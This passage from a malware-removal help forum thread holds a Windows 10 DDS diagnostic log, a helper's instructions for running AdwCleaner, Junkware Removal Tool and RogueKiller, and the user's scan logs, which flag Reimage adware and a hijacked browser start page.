S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 USER_ESRV_SVC_WILLAMETTE;User Energy Server Service WILLAMETTE;C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [2016-6-19 416408]
S3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2017-3-15 719872]
S3 wdm_usb;wdm_usb;C:\WINDOWS\System32\drivers\usb2ser.sys [2016-8-16 159936]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2017-4-12 347328]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_20bc5;Windows Push Notifications User Service_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 WsAudio_Device(1);WsAudio_Device(1);C:\WINDOWS\System32\drivers\VirtualAudio1.sys [2016-6-10 31080]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2016-7-16 216064]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2017-3-15 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-8-31 43520]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: SZBrowser.exe: open="C:\Program Files\AVAST Software\SZBrowser\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2017-04-13 21:14:37   --------   d-----w-   C:\ProgramData\SWCUTemp
2017-04-12 23:17:39   --------   d-----w-   C:\Program Files\Reimage
2017-04-12 22:06:59   79360   ----a-w-   C:\WINDOWS\SysWow64\asycfilt.dll
2017-04-12 22:05:59   12800   ----a-w-   C:\Program Files\Windows Defender\mpuxhostproxy.dll
2017-04-12 22:04:49   411648   ----a-w-   C:\WINDOWS\System32\SensorsApi.dll
2017-04-12 22:03:59   949248   ----a-w-   C:\WINDOWS\System32\Windows.Devices.PointOfService.dll
2017-04-12 22:02:59   379904   ----a-w-   C:\WINDOWS\System32\apprepsync.dll
2017-04-12 21:19:09   --------   d-----w-   C:\ProgramData\{96FE539D-1CBC-D95B-9A7A-47190038CCD7}
2017-04-05 00:41:42   --------   d-----w-   C:\WINDOWS\Panther
2017-04-02 21:15:58   --------   d-----w-   C:\Program Files\iPod
2017-04-02 21:15:57   --------   d---a-w-   C:\Program Files\iTunes
2017-03-15 23:48:59   753152   ----a-w-   C:\WINDOWS\SysWow64\imapi2fs.dll
2017-03-15 23:47:59   57344   ----a-w-   C:\WINDOWS\SysWow64\WPDShServiceObj.dll
2017-03-15 23:46:59   2828384   ----a-w-   C:\WINDOWS\System32\d3d11.dll
2017-03-15 23:45:57   5384192   ----a-w-   C:\WINDOWS\System32\dbgeng.dll
2017-03-15 23:44:59   80224   ----a-w-   C:\WINDOWS\System32\drivers\vmbkmcl.sys
2017-03-15 23:43:03   8886976   ----a-w-   C:\WINDOWS\SysWow64\OneDriveSetup.exe
.
==================== Find3M  ====================
.
2017-04-13 21:51:01   192216   ----a-w-   C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2017-04-05 00:27:20   75704   ----a-w-   C:\WINDOWS\System32\drivers\aswRvrt.sys
2017-04-05 00:27:20   38296   ----a-w-   C:\WINDOWS\System32\drivers\aswHwid.sys
2017-04-05 00:27:20   339696   ----a-w-   C:\WINDOWS\System32\drivers\aswVmm.sys
2017-04-05 00:27:20   127112   ----a-w-   C:\WINDOWS\System32\drivers\aswMonFlt.sys
2017-04-05 00:27:20   101152   ----a-w-   C:\WINDOWS\System32\drivers\aswRdr2.sys
2017-04-05 00:26:46   32600   ----a-w-   C:\WINDOWS\System32\drivers\aswKbd.sys
2017-04-05 00:26:46   1005048   ----a-w-   C:\WINDOWS\System32\drivers\aswSnx.sys
2017-04-05 00:26:29   48528   ----a-w-   C:\WINDOWS\System32\drivers\aswbuniva.sys
2017-04-05 00:26:29   334088   ----a-w-   C:\WINDOWS\System32\drivers\aswbloga.sys
2017-04-05 00:26:29   307736   ----a-w-   C:\WINDOWS\System32\drivers\aswbidsdrivera.sys
2017-04-05 00:26:29   189768   ----a-w-   C:\WINDOWS\System32\drivers\aswbidsha.sys
2017-04-01 18:52:38   835576   ----a-w-   C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2017-04-01 18:52:38   177656   ----a-w-   C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2017-03-28 07:10:34   484584   ----a-w-   C:\WINDOWS\SysWow64\AudioSes.dll
2017-03-28 07:10:28   315744   ----a-w-   C:\WINDOWS\SysWow64\atmfd.dll
2017-03-28 06:36:11   142176   ----a-w-   C:\WINDOWS\System32\acmigration.dll
2017-03-28 06:36:08   343904   ----a-w-   C:\WINDOWS\System32\invagent.dll
2017-03-28 06:36:05   565088   ----a-w-   C:\WINDOWS\System32\devinv.dll
2017-03-28 06:36:05   1617760   ----a-w-   C:\WINDOWS\System32\appraiser.dll
2017-03-28 06:36:05   1294688   ----a-w-   C:\WINDOWS\System32\aeinv.dll
2017-03-28 06:35:59   379232   ----a-w-   C:\WINDOWS\System32\atmfd.dll
2017-03-28 06:32:26   198856   ----a-w-   C:\WINDOWS\System32\wscapi.dll
2017-03-28 06:29:11   2213248   ----a-w-   C:\WINDOWS\System32\KernelBase.dll
2017-03-28 06:28:05   7786336   ----a-w-   C:\WINDOWS\System32\ntoskrnl.exe
2017-03-28 06:28:03   773720   ----a-w-   C:\WINDOWS\System32\oleaut32.dll
2017-03-28 06:26:21   603488   ----a-w-   C:\WINDOWS\System32\ContentDeliveryManager.Utilities.dll
2017-03-28 06:26:11   218520   ----a-w-   C:\WINDOWS\System32\LsaIso.exe
2017-03-28 06:22:07   2681200   ----a-w-   C:\WINDOWS\System32\CoreUIComponents.dll
2017-03-28 06:21:27   167848   ----a-w-   C:\WINDOWS\SysWow64\wscapi.dll
2017-03-28 06:20:43   2717184   ----a-w-   C:\WINDOWS\SysWow64\PrintConfig.dll
2017-03-28 06:20:11   764392   ----a-w-   C:\WINDOWS\System32\CoreMessaging.dll
2017-03-28 06:20:04   1181024   ----a-w-   C:\WINDOWS\System32\drivers\ndis.sys
2017-03-28 06:19:26   601712   ----a-w-   C:\WINDOWS\SysWow64\oleaut32.dll
2017-03-28 06:18:07   1705976   ----a-w-   C:\WINDOWS\SysWow64\KernelBase.dll
2017-03-28 06:15:53   2048496   ----a-w-   C:\WINDOWS\SysWow64\CoreUIComponents.dll
2017-03-28 06:12:54   328008   ----a-w-   C:\WINDOWS\System32\Windows.Storage.ApplicationData.dll
2017-03-28 06:11:30   360040   ----a-w-   C:\WINDOWS\System32\SystemSettingsAdminFlows.exe
2017-03-28 06:11:30   2187616   ----a-w-   C:\WINDOWS\System32\drivers\dxgkrnl.sys
2017-03-28 06:11:14   1860288   ----a-w-   C:\WINDOWS\System32\Windows.ApplicationModel.Store.dll
2017-03-28 06:11:11   1738560   ----a-w-   C:\WINDOWS\System32\WindowsCodecs.dll
2017-03-28 06:11:09   402784   ----a-w-   C:\WINDOWS\System32\drivers\dxgmms1.sys
2017-03-28 06:10:53   178528   ----a-w-   C:\WINDOWS\System32\CloudExperienceHostUser.dll
2017-03-28 06:10:44   1157008   ----a-w-   C:\WINDOWS\System32\twinapi.appcore.dll
2017-03-28 06:10:42   146776   ----a-w-   C:\WINDOWS\System32\CloudExperienceHostCommon.dll
2017-03-28 06:10:41   7220184   ----a-w-   C:\WINDOWS\System32\windows.storage.dll
2017-03-28 06:10:29   1293152   ----a-w-   C:\WINDOWS\System32\LicenseManager.dll
2017-03-28 06:09:48   97128   ----a-w-   C:\WINDOWS\System32\Windows.Security.Credentials.UI.CredentialPicker.dll
2017-03-28 06:09:40   624048   ----a-w-   C:\WINDOWS\System32\drivers\cng.sys
2017-03-28 06:09:22   2446704   ----a-w-   C:\WINDOWS\System32\msxml6.dll
2017-03-28 06:09:18   682816   ----a-w-   C:\WINDOWS\System32\wer.dll
2017-03-28 06:08:48   1100128   ----a-w-   C:\WINDOWS\System32\hvix64.exe
2017-03-28 06:08:43   1267504   ----a-w-   C:\WINDOWS\System32\WinTypes.dll
2017-03-28 06:08:39   989024   ----a-w-   C:\WINDOWS\System32\hvax64.exe
2017-03-28 06:07:35   263472   ----a-w-   C:\WINDOWS\SysWow64\Windows.Storage.ApplicationData.dll
2017-03-28 06:06:47   92512   ----a-w-   C:\WINDOWS\System32\rdpudd.dll
2017-03-28 06:05:31   4260576   ----a-w-   C:\WINDOWS\System32\mfcore.dll
2017-03-28 06:05:29   8168512   ----a-w-   C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2017-03-28 06:05:17   1702392   ----a-w-   C:\WINDOWS\System32\mfasfsrcsnk.dll
2017-03-28 06:05:15   1848584   ----a-w-   C:\WINDOWS\System32\mfsrcsnk.dll
2017-03-28 06:05:14   1988048   ----a-w-   C:\WINDOWS\System32\mfmp4srcsnk.dll
2017-03-28 06:05:14   1072248   ----a-w-   C:\WINDOWS\System32\mfnetcore.dll
2017-03-28 06:05:11   1302136   ----a-w-   C:\WINDOWS\System32\mfmpeg2srcsnk.dll
2017-03-28 06:05:07   1504056   ----a-w-   C:\WINDOWS\SysWow64\WindowsCodecs.dll
2017-03-28 06:04:59   277344   ----a-w-   C:\WINDOWS\System32\drivers\msiscsi.sys
2017-03-28 06:04:58   1431232   ----a-w-   C:\WINDOWS\SysWow64\Windows.ApplicationModel.Store.dll
2017-03-28 06:04:54   1276760   ----a-w-   C:\WINDOWS\System32\ole32.dll
2017-03-28 06:04:53   136032   ----a-w-   C:\WINDOWS\SysWow64\CloudExperienceHostUser.dll
2017-03-28 06:04:39   116568   ----a-w-   C:\WINDOWS\SysWow64\CloudExperienceHostCommon.dll
2017-03-28 06:04:38   5721808   ----a-w-   C:\WINDOWS\SysWow64\windows.storage.dll
2017-03-28 06:04:32   975744   ----a-w-   C:\WINDOWS\SysWow64\twinapi.appcore.dll
2017-03-28 06:04:31   861024   ----a-w-   C:\WINDOWS\SysWow64\LicenseManager.dll
2017-03-28 06:04:31   241504   ----a-w-   C:\WINDOWS\System32\CloudExperienceHost.dll
2017-03-28 06:04:30   160088   ----a-w-   C:\WINDOWS\System32\CloudExperienceHostBroker.dll
2017-03-28 06:04:17   1600632   ----a-w-   C:\WINDOWS\System32\sppobjs.dll
2017-03-28 06:02:55   576408   ----a-w-   C:\WINDOWS\SysWow64\wer.dll
2017-03-28 06:02:48   1980768   ----a-w-   C:\WINDOWS\SysWow64\msxml6.dll
2017-03-28 06:02:01   846560   ----a-w-   C:\WINDOWS\SysWow64\WinTypes.dll
2017-03-28 06:00:09   1569184   ----a-w-   C:\WINDOWS\System32\gdi32full.dll
2017-03-28 06:00:05   628552   ----a-w-   C:\WINDOWS\System32\fontdrvhost.exe
2017-03-28 05:59:11   6667520   ----a-w-   C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2017-03-28 05:59:05   2533728   ----a-w-   C:\WINDOWS\System32\drivers\tcpip.sys
2017-03-28 05:59:01   4023008   ----a-w-   C:\WINDOWS\SysWow64\mfcore.dll
2017-03-28 05:58:59   1851688   ----a-w-   C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2017-03-28 05:58:53   981888   ----a-w-   C:\WINDOWS\SysWow64\mfnetcore.dll
2017-03-28 05:58:53   1360464   ----a-w-   C:\WINDOWS\SysWow64\mfnetsrc.dll
2017-03-28 05:58:53   1344448   ----a-w-   C:\WINDOWS\SysWow64\mfsrcsnk.dll
2017-03-28 05:58:52   1277856   ----a-w-   C:\WINDOWS\SysWow64\mfasfsrcsnk.dll
2017-03-28 05:58:50   1202936   ----a-w-   C:\WINDOWS\SysWow64\mfmpeg2srcsnk.dll
2017-03-28 05:58:45   387872   ----a-w-   C:\WINDOWS\System32\wmpps.dll
2017-03-28 05:58:44   372440   ----a-w-   C:\WINDOWS\System32\Windows.Media.MediaControl.dll
2017-03-28 05:58:27   961192   ----a-w-   C:\WINDOWS\SysWow64\ole32.dll
2017-03-28 05:53:54   545944   ----a-w-   C:\WINDOWS\SysWow64\fontdrvhost.exe
2017-03-28 05:53:54   1414728   ----a-w-   C:\WINDOWS\SysWow64\gdi32full.dll
2017-03-28 05:52:00   306800   ----a-w-   C:\WINDOWS\SysWow64\Windows.Media.MediaControl.dll
2017-03-28 05:48:07   5685760   ----a-w-   C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2017-03-28 05:44:50   7216640   ----a-w-   C:\WINDOWS\System32\Windows.Data.Pdf.dll
2017-03-28 05:42:28   95232   ----a-w-   C:\WINDOWS\SysWow64\UserDataTimeUtil.dll
2017-03-28 05:42:06   51712   ----a-w-   C:\WINDOWS\SysWow64\usoapi.dll
2017-03-28 05:41:51   372736   ----a-w-   C:\WINDOWS\System32\RDXTaskFactory.dll
.
============= FINISH: 17:52:37.31 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 10 Home
Boot Device: \Device\HarddiskVolume2
Install Date: 8/7/2016 2:17:33 PM
System Uptime: 4/13/2017 5:12:19 PM (0 hours ago)
.
Motherboard: Gateway |  | EG50_HC_CR
Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz | U3E1 | 1800/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 281 GiB total, 156.068 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP44: 4/12/2017 6:31:40 PM - Windows Update
.
==== Installed Programs ======================
.
Apple Application Support (32-bit)
Apple Application Support (64-bit)
Apple Mobile Device Support
Apple Software Update
Avast Free Antivirus
Bonjour
Broadcom Card Reader Driver Installer
CCleaner
Defraggler
ELAN Touchpad 11.15.0.18_X64
ESET Online Scanner v3
Google Chrome
Google Update Helper
ImgBurn
Intel(R) Driver Update Utility 2.5
Intel(R) Management Engine Components
Intel(R) ME UninstallLegacy
Intel(R) Processor Graphics
Intel(R) Product Improvement Program
Intel® Driver Update Utility
Intel® Security Assist
Intel® Trusted Connect Service Client
iTunes
LibreOffice 5.2.6.2
Malwarebytes Anti-Malware version 2.2.1.1043
Microsoft OneDrive
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026
Microsoft Visual C++ 2015 x86 Additional Runtime - 14.0.23026
Microsoft Visual C++ 2015 x86 Minimum Runtime - 14.0.23026
Mp3tag v2.81
MusicBee 3.0
Qualcomm Atheros Bluetooth Suite (64)
Qualcomm Atheros WiFi Driver Installation
SafeZone Stable 3.55.2393.596
Samsung USB Driver for Mobile Phones
Smart Switch
Speccy
SpywareBlaster 5.5
SumatraPDF
SUPERAntiSpyware
Windows 10 Upgrade Assistant
.
==== Event Viewer Messages From Past Week ========
.
4/13/2017 5:13:31 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {8D8F4F83-3594-4F07-8369-FC3C3CAE4919}  and APPID  {F72671A9-012C-4725-9D2F-2A4D32D65169}  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
4/13/2017 5:12:48 PM, Error: Service Control Manager [7000]  - The Update service service failed to start due to the following error:  Access is denied.
4/13/2017 5:11:32 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
4/12/2017 5:18:50 PM, Error: Service Control Manager [7034]  - The Update service service terminated unexpectedly.  It has done this 1 time(s).
4/12/2017 4:06:21 PM, Error: Microsoft-Windows-WLAN-AutoConfig [4003]  - WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.  Code: 8 0x0 0x0
4/12/2017 4:05:59 PM, Error: Microsoft-Windows-WLAN-AutoConfig [4003]  - WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.  Code: 2 0xDEADDEED 0xEEEC
4/12/2017 4:05:59 PM, Error: Microsoft-Windows-WLAN-AutoConfig [4003]  - WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.  Code: 1 0xC 0x4
.
==== End Of File ===========================
« Last Edit: April 13, 2017, 05:30:40 PM by Hoov »

Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #1 on: April 13, 2017, 05:32:14 PM »
Can you tell me what your computer is doing?

1.- Download AdwCleaner by Xplode onto your Desktop.
  •   Please close all open programs and internet browsers.
  •   Double click on Adwcleaner.exe to run the tool.
  •   Click on the Scan button..
  •   Please be patient as this can take a while to complete.
  •   You will get a prompt asking to close all programs. Click OK.
  •   Click OK again to reboot your computer. A text file will open after the restart.
  •   Please post the content of that logfile in your reply.
  •   You can find the logfile at C:\AdwCleaner[Sn].txt.
2.- Download Junkware Removal Tool to your desktop.
  • Shutdown your antivirus to avoid any conflicts.
  • Run the tool by double-clicking it.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt in your next message.
3.- Please download RogueKiller and Save to the desktop.
  • Close all windows and browsers
  • Double click on RogueKiller.exe to run the tool.
  • Press the scan button.
  • A report opens on the desktop named - RKreport.txt
  • Please post it in your next reply.

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #2 on: April 13, 2017, 07:18:57 PM »
trying to get all my files off this computer before it gets scrapped. unfortunately stuff started not working anymore. my usb port quit working so i can't use my external hd, my dvd burner/player disappears every so often, and i can't back up the files for my new computer. this hd is still good yet, and would like to keep it but also need my files on here. beyond fustrated at the moment.

while doing the scan some issues did come to light so hoping that is part of the issue. i don't have backups on some of the files on this computer. i know better :(

# AdwCleaner v6.045 - Logfile created 13/04/2017 at 19:57:42
# Updated on 28/03/2017 by Malwarebytes
# Database : 2017-04-13.1 [Server]
# Operating System : Windows 10 Home  (X64)
# Username : ghy - DESKTOP-4GKB2LG
# Running from : C:\Users\ghy\Downloads\AdwCleaner.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

Service Found:  Update service


***** [ Folders ] *****

Folder Found:  C:\Program Files\Reimage
Folder Found:  C:\Program Files\reimage


***** [ Files ] *****

File Found:  C:\WINDOWS\Reimage.ini


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

Task Found:  Yahoo! Powered tadid


***** [ Registry ] *****

Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Found:  HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Found:  HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\PRODUCTSETUP
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Reimage
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\csastats
Key Found:  HKCU\Software\PRODUCTSETUP
Key Found:  HKCU\Software\Reimage
Key Found:  HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKCU\Software\csastats
Key Found:  [x64] HKCU\Software\PRODUCTSETUP
Key Found:  [x64] HKCU\Software\Reimage
Key Found:  [x64] HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  [x64] HKCU\Software\csastats
Key Found:  [x64] HKLM\SOFTWARE\Reimage
Data Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&p
Data Found:  HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3
Data Found:  HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3
Data Found:  [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa
Data Found:  [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
No malicious Chromium based browser items found.

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [1307 Bytes] - [14/06/2016 11:32:50]
C:\AdwCleaner\AdwCleaner[C2].txt - [1539 Bytes] - [17/11/2016 20:47:04]
C:\AdwCleaner\AdwCleaner[S1].txt - [1114 Bytes] - [14/06/2016 11:29:35]
C:\AdwCleaner\AdwCleaner[S2].txt - [1093 Bytes] - [03/08/2016 19:32:09]
C:\AdwCleaner\AdwCleaner[S3].txt - [1655 Bytes] - [17/11/2016 20:46:43]
C:\AdwCleaner\AdwCleaner[S4].txt - [5142 Bytes] - [13/04/2017 19:57:42]

########## EOF - C:\AdwCleaner\AdwCleaner[S4].txt - [5215 Bytes] ##########

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #3 on: April 13, 2017, 07:20:55 PM »
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 10 Home x64
Ran by ghy (Administrator) on Thu 04/13/2017 at 20:07:24.77
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 2

Successfully deleted: C:\WINDOWS\reimage.ini (File)
Successfully deleted: C:\Program Files\reimage (Folder)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 04/13/2017 at 20:12:50.72
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
